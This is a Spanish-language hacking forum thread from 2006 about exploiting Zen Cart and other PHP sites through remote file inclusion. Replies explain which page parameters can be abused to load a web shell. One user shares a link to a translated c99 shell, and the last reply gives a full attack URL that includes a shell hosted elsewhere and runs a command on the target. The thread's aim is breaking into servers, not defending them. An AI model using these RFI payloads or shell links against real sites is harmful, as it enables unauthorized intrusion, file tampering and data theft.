Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 18, 2008, 01:26:32
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNsEcUre)  |  Tema: Zent Cart Exploit con SSS --RFI ayuda porfavor 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Zent Cart Exploit con SSS --RFI ayuda porfavor  (Leído 426 veces)
PowaZ0r(ELe)
Recien Llegado
*
Desconectado Desconectado

Mensajes: 5



Ver Perfil
« en: Octubre 17, 2006, 09:41:37 »
« Última modificación: Octubre 17, 2006, 11:13:15 por tiobriner » En línea
ponisito
Recien Llegado
*
Desconectado Desconectado

Mensajes: 12



Ver Perfil Email
« Respuesta #1 en: Diciembre 18, 2006, 09:19:11 »
amigo has podido encontar algo estoy en las mismas condiciones que vos
atte
En línea
"Abstinencia informatica.... NOOOOOOOOOOO"
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« Respuesta #2 en: Diciembre 19, 2006, 05:48:48 »
 Te explico el problema: Si vos encontras una web que tiene por ejemplo "index.php?page=" ni significa que al agregarle tu shell despues de page entraras al server, porque digo esto? te lo digo porque ?page= es una variable a la cual se le asigna una configuracion y si esta configuracion esta en perfectas condiciones solamente va a tener un resultado por ejemplo page=mesa entonces vos al poner page=www.miweb.com/mishell no vas a entrar si no que te va a saltar error o simplemente te redireccionara al index.php.
 Las variables vulnerables son las que tengan al codigo include que lo podes ver en el codigo de fuente, muchas veces si podes entrar con la shell pero no tienes permisos de escritura entonces no puedes hacer nada  Grin si quieres  saber como se ve una web con que esta por ser atacada via shell pues te dejaria un screen pero en este momento no tengo Cheesy pero lo unico que sale son los archivos que tiene el website y te aparece para poder editarlos,borrarlos,subir archivos,etc,etc.

 PD: Cualquier duda respondes  Wink

 Pr0gr4mer
En línea



 Tu respuesta esta dandole click al
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
San Buscador


 .::Pr0gr4mer::.
PowaZor(Ele)
Miembro
*****
Desconectado Desconectado

Mensajes: 110



Ver Perfil
« Respuesta #3 en: Diciembre 20, 2006, 06:47:03 »
gracias por la respuesta xD...lo que pasa es que esa cuenta (la que inicio este post) tuve un rpoblema con el mail y tube q crearme otra xD, yo ya se como se hace xD...pero de todas maneras gracias por la ayuda Wink
En línea
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« Respuesta #4 en: Diciembre 21, 2006, 08:27:14 »
Cita de: PowaZor(Ele) en Diciembre 20, 2006, 06:47:03
gracias por la respuesta xD...lo que pasa es que esa cuenta (la que inicio este post) tuve un rpoblema con el mail y tube q crearme otra xD, yo ya se como se hace xD...pero de todas maneras gracias por la ayuda Wink




 Okaz de nada, si no tienes una buena shell o bien no la tenes bien configurada podes usar la mia  Wink
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

 Pr0gr4mer
En línea



 Tu respuesta esta dandole click al
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
San Buscador


 .::Pr0gr4mer::.
PowaZor(Ele)
Miembro
*****
Desconectado Desconectado

Mensajes: 110



Ver Perfil
« Respuesta #5 en: Diciembre 21, 2006, 10:51:40 »
Cita de: Pr0gr4mer en Diciembre 21, 2006, 08:27:14
Cita de: PowaZor(Ele) en Diciembre 20, 2006, 06:47:03
gracias por la respuesta xD...lo que pasa es que esa cuenta (la que inicio este post) tuve un rpoblema con el mail y tube q crearme otra xD, yo ya se como se hace xD...pero de todas maneras gracias por la ayuda Wink




 Okaz de nada, si no tienes una buena shell o bien no la tenes bien configurada podes usar la mia  Wink
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

 Pr0gr4mer

man muchas gracias Wink...un datito xD, esa es la build #13, yo tengo la #16 te dejo la dir Tongue

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.usuarios.lycos.es/tiobriner/c99.txt

(esta traducida por mi Tongue)






Saludos  Grin Grin
En línea
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« Respuesta #6 en: Diciembre 22, 2006, 08:11:13 »
 Jejeje estem... gracias pero prefiero la mia tengo varias anegdotas con ella y cosas que disfrute mucho... no quisiera perderla  Cheesy

 Pr0gr4mer
En línea



 Tu respuesta esta dandole click al
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
San Buscador


 .::Pr0gr4mer::.
WiNsMuRf
Colaborador
*****
Desconectado Desconectado

Mensajes: 858


Tux Rlz!


Ver Perfil WWW
« Respuesta #7 en: Diciembre 23, 2006, 09:04:08 »
correccion:

index.php?page=http://ar.geocities.com/pr0gr4mer/shell.txt?&cmd=ls

saludos
En línea





No respondo mensajes privados ni atiendo en el messenger..
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNsEcUre)  |  Tema: Zent Cart Exploit con SSS --RFI ayuda porfavor « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC